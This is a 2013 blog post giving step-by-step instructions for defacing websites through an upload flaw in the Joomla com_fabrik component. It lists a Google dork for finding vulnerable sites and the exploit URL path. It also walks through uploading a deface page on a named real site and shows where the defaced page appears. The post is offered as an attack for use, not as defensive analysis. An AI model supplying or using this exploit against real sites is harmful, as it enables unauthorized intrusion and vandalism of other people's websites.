Sunday, December 22, 2013

Joomla Component (com_Fabrik) Remote Deface page Upload Vulnerability


{Screen Shot}

Joomla Component (com_Fabrik) Remote Deface page Upload Vulnerability

Click Here For Video Tutorial 

Google Dork : inurl:index.php?option=com_fabrik
or
index.php?option=com_fabrik

Exploit:
/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

Sample:
http://www.usatovip.it/= add exploit

now it looks like

http://www.usatovip.it/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

Browse and upload your deface page
When error appears just ignore it

You will access your deface page here ( http://victimsite.com/media/defacepage.html

just like this:

http://www.usatovip.it/media/Mr.M3.html

Thanks For Visit :)





Posted by at
Labels:

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)